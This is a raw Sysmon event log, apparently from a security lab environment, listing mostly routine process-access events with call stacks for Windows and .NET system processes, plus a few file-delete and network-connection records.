10341000x800000000000000080948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.403{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-010F-00000000BB01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.403{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-010F-00000000BB01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.341{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-000F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.325{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-000F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.325{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-000F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.263{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-FF0E-00000000BB01}5616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.247{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-FF0E-00000000BB01}5616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.247{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-FF0E-00000000BB01}5616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.044{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-FE0E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.044{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-FE0E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.044{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-FE0E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.997{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-FD0E-00000000BB01}6036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050598Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:51.346{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBED3A001C1C8AC2B71885290760C637,SHA256=6BD0232AE3A7C4EE207ED675EC1A5F0EFD34E9089E7325CE21FB4B844D4BC9E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050597Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:49.132{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54065-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050596Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:51.049{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C67CC4FBBA640CC541C017564AAA0240,SHA256=B864D8218FF9D93FC2DCD32382D56D9D80692A4F05FD76044966D24073DD5420,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.981{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-170F-00000000BB01}5840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.966{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-170F-00000000BB01}5840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.966{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-170F-00000000BB01}5840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.935{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-160F-00000000BB01}5984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.919{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-160F-00000000BB01}5984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.919{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-160F-00000000BB01}5984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.919{A7A01FEF-EC2C-607E-150F-00000000BB01}58526264C:\Windows\system32\conhost.exe{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.903{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-150F-00000000BB01}5852C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.903{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.903{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\pcasvc.dll+43591|c:\windows\system32\pcasvc.dll+22bed|C:\Windows\SYSTEM32\ntdll.dll+7de1d|C:\Windows\SYSTEM32\ntdll.dll+3a969|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.903{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.903{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 